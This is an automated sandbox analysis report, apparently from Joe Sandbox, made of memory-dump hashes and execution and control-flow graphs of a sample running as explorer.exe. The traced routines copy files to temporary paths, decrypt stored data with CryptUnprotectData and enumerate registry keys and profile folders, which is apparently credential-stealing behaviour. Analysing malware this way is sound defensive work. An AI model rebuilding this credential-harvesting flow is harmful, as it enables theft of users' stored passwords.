• Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
• Instruction ID: f976abf0b506ce6ff8f37bbd7c8af7624669eab2ab4b5b0fb9c0d747e7254d45
• Opcode Fuzzy Hash: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
• Instruction Fuzzy Hash: 1601472124C991BCE331E33CC908904BFE69B4FB6475802FAD2A15A0C7DA214589DFE7
Memory Dump Source
• Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
• Instruction ID: c5c43ab6752ee8d18fcb74b59ff98ad39f6596117cd62c5b2c77ced72334e6aa
• Opcode Fuzzy Hash: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
• Instruction Fuzzy Hash: B111E2321002609FDF21AF24C49569AFBB2FF4530C375A188C9969B111E722AD8FCB91
Memory Dump Source
• Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
• Instruction ID: 20a1f56e34deb81daffe23ddf7f3a634b4938193a6ef7f98b4fa68dc7b801d93
• Opcode Fuzzy Hash: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
• Instruction Fuzzy Hash: 09F078B2A04347EBD715AAF482844AEBB20A740731BA4265BD5E6E62E1D779C504D704
Memory Dump Source
• Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
• Instruction ID: c48700b05c06e988df87cd580ca5e4308363d13747befdac9a33251d9afddee9
• Opcode Fuzzy Hash: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
• Instruction Fuzzy Hash: 8EF0227101036187CF18AB389498198BBA1EE46668798079EDDA2770D2E327A4A9CB90
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1753601388.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_770000_uahuajd.jbxd
Similarity
• API ID:
• String ID: tPq
• API String ID: 0-789928099
• Opcode ID: cb9c38d11d221ce534872f48916f67ef9bef6b3d5b3db053de8d6eb0f80cdd05
• Instruction ID: 2bd120dd0c9731942026a3f1dc3e896daa985b81d3bf38a4e44ccd71c8285da3
• Opcode Fuzzy Hash: cb9c38d11d221ce534872f48916f67ef9bef6b3d5b3db053de8d6eb0f80cdd05
• Instruction Fuzzy Hash: 24316B35B056108FCB19AB78D45896D7BE2AF8931232508B9E406CF3B6DE36DC42CB91
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1753601388.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_770000_uahuajd.jbxd
Similarity
• API ID:
• String ID: 8q
• API String ID: 0-4083045702
• Opcode ID: 6c0c659414bab8ecb5d511b42f03da7d0b40b85d78b2502eb82c69f9bf56e101
• Instruction ID: d28ab6380013ffff1b2b64f49c8a46dec2a74f4ff9c283073931c2415d3a9b88
• Opcode Fuzzy Hash: 6c0c659414bab8ecb5d511b42f03da7d0b40b85d78b2502eb82c69f9bf56e101
• Instruction Fuzzy Hash: A101D638705210DFCB61EB78E054B59BBE1EF49344F0041ACE009EF365C7719C059B90
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1753601388.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_770000_uahuajd.jbxd
Similarity
• API ID:
• String ID: 8q
• API String ID: 0-4083045702
• Opcode ID: b12b3343e8fdd381cd73e50fb7fbbee6f30e92f7324c762d87e3c76c0ffee923
• Instruction ID: 5745791e404c568f53a13efbb2326f9b79e59b8e9bf578fbbeca6e93667089bc
                                                                                                                                                      • Opcode Fuzzy Hash: b12b3343e8fdd381cd73e50fb7fbbee6f30e92f7324c762d87e3c76c0ffee923
                                                                                                                                                      • Instruction Fuzzy Hash: 96F027346063508FC752EBB8F410A98BFE0AF8930070401ADE009DF3A6CB245C09DB91
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.1753601388.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_770000_uahuajd.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 8q
                                                                                                                                                      • API String ID: 0-4083045702
                                                                                                                                                      • Opcode ID: e7df0fd205004bba0c42505ea1a1cdf9bb3d9ab64dec680f47b5ddf5ac8c08e6
                                                                                                                                                      • Instruction ID: 37bcc7494e0d03ebea72d700d3c781036b9f6fe45070616fdf816560cbce8f1a
                                                                                                                                                      • Opcode Fuzzy Hash: e7df0fd205004bba0c42505ea1a1cdf9bb3d9ab64dec680f47b5ddf5ac8c08e6
                                                                                                                                                      • Instruction Fuzzy Hash: B4E09A746013248FCBA1EBA9F400B69BBD5EF88350B004468E109AF368CA30AC069BE1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.1753601388.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_770000_uahuajd.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 7bf2ca6d26a5b363a62e4e8cd84bdc605f5a165a9337face2d188d039e864c15
                                                                                                                                                      • Instruction ID: 8774009be1cdf670fbe390956c3655553b2a9b4865855722e8f51bc9e31ffc45
                                                                                                                                                      • Opcode Fuzzy Hash: 7bf2ca6d26a5b363a62e4e8cd84bdc605f5a165a9337face2d188d039e864c15
                                                                                                                                                      • Instruction Fuzzy Hash: 5581CC34E00308DFDB11EBB8D8546AEB7E2EB88350F148569D409AB355DF75AD06CBD2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.1753601388.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_770000_uahuajd.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 524fe9d380a98d1496b844e72fa3ae2ba9f84d710b123055b66642353be4bbe4
                                                                                                                                                      • Instruction ID: 784b8c6e7171495de7e849d5d36d1ab3942c8eca32e7f0f784511efa316ffbe6
                                                                                                                                                      • Opcode Fuzzy Hash: 524fe9d380a98d1496b844e72fa3ae2ba9f84d710b123055b66642353be4bbe4
                                                                                                                                                      • Instruction Fuzzy Hash: AC211934E002088FDF14ABB8851876DB7E2AB84315F558469D80A9B355DF79EC428B91
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.1753601388.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_770000_uahuajd.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: b8a2003535acbaeb0fff2556b1870ad570d34f4327950bf19007848263bb3d06
                                                                                                                                                      • Instruction ID: 83a5fa1f7e890f6432aca17d44dc0fea400aade611153de4f1db5975d67a7dbd
                                                                                                                                                      • Opcode Fuzzy Hash: b8a2003535acbaeb0fff2556b1870ad570d34f4327950bf19007848263bb3d06
                                                                                                                                                      • Instruction Fuzzy Hash: F3F06D39204250DFCB61EBA4E444A687FB0EB49664B1042A9E8099B322C76198019B81
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.1753601388.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_770000_uahuajd.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c54fd1e1f8a0c10d2f36ec639c2387fd079666700bcb8034ca1477806f1d1dae
                                                                                                                                                      • Instruction ID: bb745dc3523b65a87d9eaec7dea07da9f4c8832cad14c5823a0e4b6bce698aee
                                                                                                                                                      • Opcode Fuzzy Hash: c54fd1e1f8a0c10d2f36ec639c2387fd079666700bcb8034ca1477806f1d1dae
                                                                                                                                                      • Instruction Fuzzy Hash: B5D09E381452449FCB41DB74E454C593FB1EB4A2107144299E80A9B336C7719846DB41

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:3.9%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:48.3%
                                                                                                                                                      Signature Coverage:24.1%
                                                                                                                                                      Total number of Nodes:816
                                                                                                                                                      Total number of Limit Nodes:84
                                                                                                                                                      execution_graph 28726 a056a2 _allrem 27720 a024a4 27723 a02198 RtlZeroMemory GetVersionExW 27720->27723 27724 a021cb LoadLibraryW 27723->27724 27726 a0249b 27724->27726 27727 a021fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27724->27727 27728 a02492 FreeLibrary 27727->27728 27736 a02244 27727->27736 27728->27726 27729 a0247b 27729->27728 27730 a022e1 RtlCompareMemory 27730->27736 27731 a02365 RtlCompareMemory 27731->27736 27732 a01953 6 API calls 27732->27736 27733 a023f8 StrStrIW 27733->27736 27734 a01011 GetProcessHeap RtlFreeHeap VirtualQuery 27734->27736 27735 a017c0 9 API calls 27735->27736 27736->27728 27736->27729 27736->27730 27736->27731 27736->27732 27736->27733 27736->27734 27736->27735 27918 a02ea5 25 API calls 27919 a09ea7 RtlAllocateHeap 27920 a09ec1 27919->27920 27921 a09ed9 27919->27921 27923 a07f70 17 API calls 27920->27923 27923->27921 28622 a1b8a6 90 API calls 28623 a1b0aa 84 API calls 28624 a06eb7 24 API calls 28625 a048b1 22 API calls 27930 a02cb5 27931 a02cbe 27930->27931 27932 a01953 6 API calls 27931->27932 27933 a02cc3 27932->27933 27934 a02e17 27933->27934 27935 a01953 6 API calls 27933->27935 27936 a02cd9 27935->27936 27959 a01000 GetProcessHeap RtlAllocateHeap 27936->27959 27938 a02ce9 27960 a01000 GetProcessHeap RtlAllocateHeap 27938->27960 27940 a02cf9 27941 a01b6a 2 API calls 27940->27941 27942 a02d04 27941->27942 27943 a02ded 27942->27943 27944 a02d0c GetPrivateProfileSectionNamesW 27942->27944 27945 a01011 3 API calls 27943->27945 27944->27943 27957 a02d22 27944->27957 27946 a02e02 27945->27946 27947 a01011 3 API calls 27946->27947 27949 a02e09 27947->27949 27948 a02d3f StrStrIW 27950 a02d53 GetPrivateProfileStringW 27948->27950 27951 a02dd7 lstrlenW 27948->27951 27952 a01011 3 API calls 27949->27952 27950->27951 27954 a02d72 GetPrivateProfileIntW 
27950->27954 27951->27943 27951->27957 27953 a02e10 27952->27953 27955 a01011 3 API calls 27953->27955 27954->27957 27955->27934 27956 a01953 6 API calls 27956->27957 27957->27943 27957->27948 27957->27951 27957->27956 27958 a01011 3 API calls 27957->27958 27958->27957 27959->27938 27960->27940 28626 a178b9 33 API calls 28729 a212bb _allmul _allmul _allmul _alldvrm _allmul 28627 a213ca 87 API calls 28731 a213ca 89 API calls 28732 a096bc _alldiv _alldiv _alldiv _alldiv _allmul 28734 a10284 39 API calls 28630 a4348f 27 API calls 28382 a03098 28383 a01b6a 2 API calls 28382->28383 28385 a030af 28383->28385 28384 a033a9 28385->28384 28406 a01000 GetProcessHeap RtlAllocateHeap 28385->28406 28387 a030ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28388 a54bec 89 API calls 28387->28388 28391 a03126 28388->28391 28389 a0339b DeleteFileW 28390 a01011 3 API calls 28389->28390 28390->28384 28391->28389 28392 a03392 28391->28392 28407 a202ec 94 API calls 28391->28407 28394 a53848 76 API calls 28392->28394 28394->28389 28395 a03381 28410 a1fb92 93 API calls 28395->28410 28397 a0319c RtlCompareMemory 28398 a032cd CryptUnprotectData 28397->28398 28403 a03155 28397->28403 28398->28403 28400 a031d0 RtlZeroMemory 28408 a01000 GetProcessHeap RtlAllocateHeap 28400->28408 28402 a01011 3 API calls 28402->28403 28403->28395 28403->28397 28403->28398 28403->28400 28403->28402 28404 a01fa7 19 API calls 28403->28404 28405 a01798 lstrlen 28403->28405 28409 a202ec 94 API calls 28403->28409 28404->28403 28405->28403 28406->28387 28407->28403 28408->28403 28409->28403 28410->28392 28739 a16698 30 API calls 28634 a42c9e 105 API calls 28740 a0629a 23 API calls 28743 a2069d _allmul 27924 a09ee8 27925 a09ef1 RtlFreeHeap 27924->27925 27926 a09f1a 27924->27926 27925->27926 27927 a09f02 27925->27927 27929 a07f70 17 API calls 27927->27929 27929->27926 28637 a0f4ec 20 API calls 28638 a04cf5 memset 28744 a39ef6 114 API calls 28639 a213ca 89 API calls 27997 a028f8 27998 a02900 27997->27998 27999 
a02ac8 27997->27999 28032 a01000 GetProcessHeap RtlAllocateHeap 27998->28032 28029 a53848 27999->28029 28002 a0290e 28033 a202ec 94 API calls 28002->28033 28005 a01011 3 API calls 28006 a02adf 28005->28006 28008 a02a98 lstrlen 28009 a02ac1 28008->28009 28010 a02aa4 28008->28010 28012 a01011 3 API calls 28009->28012 28038 a01798 lstrlen 28010->28038 28012->27999 28013 a01fa7 19 API calls 28017 a02919 28013->28017 28014 a02ab1 28039 a01798 lstrlen 28014->28039 28016 a02ab9 28040 a01798 lstrlen 28016->28040 28017->28013 28019 a029da lstrlen 28017->28019 28023 a02a8b 28017->28023 28034 a01000 GetProcessHeap RtlAllocateHeap 28017->28034 28035 a02112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28017->28035 28036 a202ec 94 API calls 28017->28036 28019->28017 28020 a029eb lstrlen 28019->28020 28020->28017 28037 a1fb92 93 API calls 28023->28037 28025 a02a25 wsprintfA lstrlen 28026 a02a58 28025->28026 28027 a02a6a lstrcat 28025->28027 28026->28027 28028 a01011 3 API calls 28027->28028 28028->28017 28041 a537cb 28029->28041 28032->28002 28033->28017 28034->28017 28035->28025 28036->28017 28037->28008 28038->28014 28039->28016 28040->28009 28042 a537d6 28041->28042 28047 a02ad1 DeleteFileW 28041->28047 28053 a095b5 17 API calls 28042->28053 28044 a537db 28045 a537df 28044->28045 28049 a537eb 28044->28049 28054 a54da0 17 API calls 28045->28054 28047->28005 28048 a53834 28056 a53865 71 API calls 28048->28056 28049->28048 28051 a5381f 28049->28051 28055 a08795 22 API calls 28051->28055 28053->28044 28054->28047 28055->28047 28056->28047 28746 a213ca 88 API calls 28641 a05cc5 22 API calls 28750 a2faca _allmul strcspn 28642 a06eb7 22 API calls 28643 a15cca 32 API calls 28645 a534ca 57 API calls 28754 a2c6da 23 API calls 28649 a370de 24 API calls 28652 a3e024 93 API calls 28653 a27c28 8 API calls 28655 a0482b 14 API calls 28656 a2742e 24 API calls 28660 a1943d 34 API calls 28761 a0ca01 _allmul _alldiv _allmul _alldiv 28661 a39000 28 API calls 28664 
a45401 memset memcpy memcpy memset memcpy 28176 a04406 28177 a02e30 22 API calls 28176->28177 28178 a04429 28177->28178 28179 a02e30 22 API calls 28178->28179 28180 a0443a 28179->28180 28276 a0a40e 28279 a0a426 28276->28279 28285 a0a4a2 28276->28285 28277 a0a469 memcpy 28277->28285 28278 a0a4cc ReadFile 28281 a0a524 28278->28281 28278->28285 28279->28277 28280 a0a44a memcpy 28279->28280 28279->28285 28288 a0a45d 28280->28288 28290 a0a2aa 17 API calls 28281->28290 28283 a0a532 28284 a0a53e memset 28283->28284 28283->28288 28284->28288 28285->28278 28285->28281 28286 a0a501 28285->28286 28289 a0a1c6 18 API calls 28286->28289 28289->28288 28290->28283 28764 a20e0c 22 API calls 28767 a2f21c 23 API calls 28668 a0581f _alldiv _allrem _allmul 28669 a42864 25 API calls 28771 a33e6b 20 API calls 28671 a1f86a 31 API calls 28672 a04c6d 17 API calls 28772 a20670 _allmul _allmul _allmul _alldvrm 28677 a5507d 24 API calls 28678 a0b079 20 API calls 28680 a1807c 23 API calls 28076 a03c40 28077 a01b6a 2 API calls 28076->28077 28078 a03c50 28077->28078 28079 a03dfa 28078->28079 28112 a01000 GetProcessHeap RtlAllocateHeap 28078->28112 28081 a03c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28113 a54bec 28081->28113 28083 a03dec DeleteFileW 28084 a01011 3 API calls 28083->28084 28084->28079 28085 a03c9a 28085->28083 28086 a03de3 28085->28086 28124 a01000 GetProcessHeap RtlAllocateHeap 28085->28124 28088 a53848 76 API calls 28086->28088 28088->28083 28089 a03cce 28125 a202ec 94 API calls 28089->28125 28091 a03cd9 28092 a03da8 28091->28092 28097 a01fa7 19 API calls 28091->28097 28101 a03d2b lstrlen 28091->28101 28126 a01000 GetProcessHeap RtlAllocateHeap 28091->28126 28127 a202ec 94 API calls 28091->28127 28128 a1fb92 93 API calls 28092->28128 28094 a03db1 lstrlen 28095 a03db9 28094->28095 28096 a03ddc 28094->28096 28129 a01798 lstrlen 28095->28129 28099 a01011 3 API calls 28096->28099 28097->28091 28099->28086 28100 a03dc8 28130 a01798 lstrlen 28100->28130 28101->28091 28103 
a03d35 lstrlen 28101->28103 28103->28091 28104 a03dd2 28131 a01798 lstrlen 28104->28131 28108 a03d46 wsprintfA lstrlen 28109 a03d71 28108->28109 28110 a03d83 lstrcat 28108->28110 28109->28110 28111 a01011 3 API calls 28110->28111 28111->28091 28112->28081 28132 a5307c 28113->28132 28115 a54c01 28123 a54c44 28115->28123 28142 a1c54d memset 28115->28142 28117 a54c18 28143 a1c871 21 API calls 28117->28143 28119 a54c2a 28144 a1c518 19 API calls 28119->28144 28121 a54c33 28121->28123 28145 a5486f 89 API calls 28121->28145 28123->28085 28124->28089 28125->28091 28126->28108 28127->28091 28128->28094 28129->28100 28130->28104 28131->28096 28133 a53095 28132->28133 28141 a5308e 28132->28141 28134 a530ad 28133->28134 28159 a066ce 17 API calls 28133->28159 28136 a530ed memset 28134->28136 28134->28141 28137 a53108 28136->28137 28138 a53116 28137->28138 28160 a0c59d 17 API calls 28137->28160 28138->28141 28146 a06512 28138->28146 28141->28115 28142->28117 28143->28119 28144->28121 28145->28123 28161 a0685c 28146->28161 28148 a0651d 28148->28141 28149 a06519 28149->28148 28150 a0bfec GetSystemInfo 28149->28150 28164 a065bd 28150->28164 28152 a0c00e 28153 a065bd 16 API calls 28152->28153 28154 a0c01a 28153->28154 28155 a065bd 16 API calls 28154->28155 28156 a0c026 28155->28156 28157 a065bd 16 API calls 28156->28157 28158 a0c032 28157->28158 28158->28141 28159->28134 28160->28138 28162 a5307c 17 API calls 28161->28162 28163 a06861 28162->28163 28163->28149 28165 a5307c 17 API calls 28164->28165 28166 a065c2 28165->28166 28166->28152 28682 a04440 24 API calls 28774 a69238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 28683 a26440 94 API calls 28776 a213ca 102 API calls 28685 a47452 19 API calls 28778 a05e5a 28 API calls 28435 a0105d VirtualFree 28688 a111a0 43 API calls 28780 a28ba6 7 API calls 28781 a453ad memset memcpy memset memcpy 28782 a433b7 27 API calls 28690 a29dbc 25 API calls 28783 a213ca 89 API calls 28691 a27d8b _allrem memcpy 28787 a1ab8b 19 API calls 
28788 a1cb91 18 API calls 28693 a1fd97 19 API calls 28789 a213ca 88 API calls 28694 a01198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 28791 a0bf9a _alldiv 28478 a01b9d 28479 a01bc1 28478->28479 28480 a01ba2 28478->28480 28480->28479 28481 a01ba9 GetFileAttributesW 28480->28481 28482 a01bb5 28481->28482 28511 a0639e 28515 a0b1e3 28511->28515 28535 a0b1e5 28511->28535 28512 a063b2 28516 a0b1e5 28515->28516 28517 a0b214 28516->28517 28571 a0aeea 28516->28571 28519 a0b233 28517->28519 28521 a0b28f 28517->28521 28589 a0ae65 28517->28589 28519->28521 28555 a0a7ae 28519->28555 28521->28512 28523 a0b2d6 28568 a06a5a 28523->28568 28529 a0b2e8 28529->28521 28531 a0b310 CreateFileMappingW 28529->28531 28530 a0b26d 28595 a0a1c6 18 API calls 28530->28595 28532 a0b32b MapViewOfFile 28531->28532 28533 a0b37e 28531->28533 28532->28529 28532->28533 28596 a0a1c6 18 API calls 28533->28596 28536 a0b214 28535->28536 28537 a0b20d 28535->28537 28539 a0b233 28536->28539 28540 a0ae65 22 API calls 28536->28540 28554 a0b28f 28536->28554 28538 a0aeea 27 API calls 28537->28538 28538->28536 28541 a0a7ae 18 API calls 28539->28541 28539->28554 28540->28539 28545 a0b267 28541->28545 28542 a0b26d 28620 a0a1c6 18 API calls 28542->28620 28543 a0b2d6 28544 a06a5a 17 API calls 28543->28544 28552 a0b2e8 28544->28552 28545->28542 28545->28543 28546 a0a67c 22 API calls 28545->28546 28545->28554 28548 a0b2be 28546->28548 28548->28542 28548->28543 28549 a0b310 CreateFileMappingW 28550 a0b32b MapViewOfFile 28549->28550 28551 a0b37e 28549->28551 28550->28551 28550->28552 28621 a0a1c6 18 API calls 28551->28621 28552->28549 28552->28554 28554->28512 28557 a0a7c7 28555->28557 28556 a0a805 28556->28521 28556->28523 28556->28530 28559 a0a67c 28556->28559 28557->28556 28597 a0a1c6 18 API calls 28557->28597 28560 a0a6c1 28559->28560 28561 a0a694 _alldiv _allmul 28559->28561 28598 a0a33b SetFilePointer 28560->28598 28561->28560 28564 a0a6f0 SetEndOfFile 28565 a0a6d4 28564->28565 28567 
a0a6ee 28564->28567 28565->28567 28602 a0a1c6 18 API calls 28565->28602 28567->28523 28567->28530 28569 a5307c 17 API calls 28568->28569 28570 a06a65 28569->28570 28570->28529 28572 a06a81 memset 28571->28572 28573 a0af01 28572->28573 28574 a06a81 memset 28573->28574 28581 a0af07 28573->28581 28575 a0af2a 28574->28575 28575->28581 28604 a07f07 28575->28604 28577 a552ae _allmul 28579 a0afd9 28577->28579 28578 a0af54 28578->28577 28578->28581 28580 a0b87b 21 API calls 28579->28580 28582 a0affa 28580->28582 28581->28517 28583 a0b020 28582->28583 28584 a0b000 28582->28584 28585 a0ae65 22 API calls 28583->28585 28612 a0a1c6 18 API calls 28584->28612 28587 a0b01c 28585->28587 28587->28581 28607 a0adcc 28587->28607 28590 a0ae7a 28589->28590 28591 a0a67c 22 API calls 28590->28591 28592 a0ae83 28590->28592 28593 a0aea5 28591->28593 28592->28519 28593->28592 28619 a0a1c6 18 API calls 28593->28619 28595->28521 28596->28521 28597->28556 28599 a0a390 28598->28599 28600 a0a36a 28598->28600 28599->28564 28599->28565 28600->28599 28603 a0a1c6 18 API calls 28600->28603 28602->28567 28603->28599 28613 a07ec7 28604->28613 28609 a0ade4 28607->28609 28608 a0ae5f 28608->28581 28609->28608 28611 a0bafc 20 API calls 28609->28611 28618 a0a39e 18 API calls 28609->28618 28611->28609 28612->28587 28614 a07ed4 28613->28614 28615 a07ed9 28613->28615 28614->28578 28617 a06e6a 17 API calls 28615->28617 28617->28614 28618->28609 28619->28592 28620->28554 28621->28554 28695 a099e1 strncmp 28792 a27be1 29 API calls 28696 a0c9ea _allmul _alldiv 28698 a555eb IsProcessorFeaturePresent 28700 a049f1 13 API calls 28794 a213ca 73 API calls 28795 a19ff0 32 API calls 28701 a0d1f7 memset _allmul _allmul 28057 a047fa 28064 a0479c 28057->28064 28060 a0479c 23 API calls 28061 a04813 28060->28061 28062 a0479c 23 API calls 28061->28062 28063 a0481f 28062->28063 28065 a01afe 10 API calls 28064->28065 28066 a047af 28065->28066 28067 a047f1 28066->28067 28068 a0199d 9 API calls 28066->28068 28067->28060 28072 a047bf 
Execution graph for the explorer.exe memory dump (node and edge data of the rendered graph not reproduced). Functions recoverable from the dump and the APIs they reach directly: a03717: GetTempPathW, GetTempFileNameW, DeleteFileW, CopyFileW, RtlCompareMemory, CryptUnprotectData, RtlZeroMemory, wsprintfA, lstrlen, lstrcat, DeleteFileW (via a01b6a: CreateFileW, CloseHandle; via a02112: GetProcessHeap, RtlAllocateHeap, GetSystemTimeAsFileTime, _alldiv, wsprintfA). a02b15 and a01d4a: FindFirstFileW, lstrcmpiW, StrStrIW, FindNextFileW, FindClose, RtlComputeCrc32 (via a01cf7). a03ed9 / a03e04: PathCombineW, FindFirstFileW, lstrcmpiW, FindNextFileW, FindClose, then CreateFileW, GetFileSize, ReadFile, CloseHandle (a01c31), StrStrIA (a02fb1), CryptStringToBinaryA (a0123b), RtlCompareMemory, CryptUnprotectData. a01afe: SHGetFolderPathW; a019e5: RegOpenKeyExW, RegQueryValueExW, RegCloseKey; a02e30: StrStrIW, RegOpenKeyExW, RegEnumKeyExW, RegCloseKey; a043d9 / a04317: RegOpenKeyW, RegEnumKeyExW, RegCloseKey. a015dd / a01333: lstrlen, lstrcat, MultiByteToWideChar, RtlZeroMemory, wsprintfW, VirtualAlloc, RtlMoveMemory. a69304: LoadLibraryA, GetProcAddress, VirtualProtect (twice). a09fc8: HeapCreate. a0b87b: memset, CreateFileW. a0bafc: GetFileAttributesW, DeleteFileW. a01000: GetProcessHeap, RtlAllocateHeap; a01011: VirtualQuery, GetProcessHeap, RtlFreeHeap; a01953: lstrlenW, lstrcatW. Remaining nodes carry only API-call counts (for example a213ca 89 API calls, a25f08 102 API calls, a26340 92 API calls, a202ec 94 API calls, a1fb92 93 API calls).

Control-flow Graph

Graph rendering for the function at a03717 not reproduced (block and edge data and the Executed / Not Executed colouring are lost in the text dump). Basic blocks with API or call references: a03717-a03730 call a01b6a; a03762-a0379c call a01000, GetTempPathW, GetTempFileNameW, DeleteFileW, CopyFileW; a0379e-a037a3 call a0349b; a037a8-a037b5 call a54bec; a037bb-a037d3 call a3eeb8; a037d9-a037f1 call a01000, call a202ec; a037fc-a03816 call a01fa7 (row loop, re-entered from a03bb6-a03bc6 call a202ec); a03833-a03843 RtlCompareMemory; a03867-a038ed RtlZeroMemory, call a01000; a038f3-a03979 and a03a62-a03aed call a01fa7 (per-column reads); a03987-a039a2 lstrlen; a039a8-a039c7 call a01000; a039d1-a03a0b call a02112, wsprintfA, lstrlen; a03a1b-a03a29 lstrcat, call a01011; a03a37-a03a51 CryptUnprotectData; a03b0f-a03b2a lstrlen; a03b30-a03b4f call a01000; a03b59-a03b93 call a02112, wsprintfA, lstrlen; a03ba3-a03baf lstrcat; a03bd0-a03be3 call a1fb92, lstrlen; a03be5-a03c00 call a01798 * 3; a03c0c-a03c10 call a53848; a03c15-a03c1e DeleteFileW, call a01011; a03c2a-a03c32 call a02ffa.

APIs
  • Part of subcall function 00A01B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00A02893,00000000,00000000,00000000,?), ref: 00A01B82
  • Part of subcall function 00A01B6A: CloseHandle.KERNELBASE(00000000), ref: 00A01B8F
• GetTempPathW.KERNEL32(00000104,00000000), ref: 00A03778
• GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00A03782
• DeleteFileW.KERNELBASE(00000000), ref: 00A03789
• CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00A03794
• RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 00A0383B
• RtlZeroMemory.NTDLL(?,00000040), ref: 00A03870
• lstrlen.KERNEL32(?,?,?,?,?), ref: 00A0398B
• lstrlen.KERNEL32(00000000), ref: 00A0399A
• wsprintfA.USER32 ref: 00A039F1
• lstrlen.KERNEL32(00000000,?,?), ref: 00A039FD
• lstrcat.KERNEL32(00000000,?), ref: 00A03A21
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00A03A49
• lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00A03B13
• lstrlen.KERNEL32(00000000), ref: 00A03B22
• wsprintfA.USER32 ref: 00A03B79
• lstrlen.KERNEL32(00000000), ref: 00A03B85
• lstrcat.KERNEL32(00000000,?), ref: 00A03BA9
• lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00A03BDA
• DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00A03C16
Strings
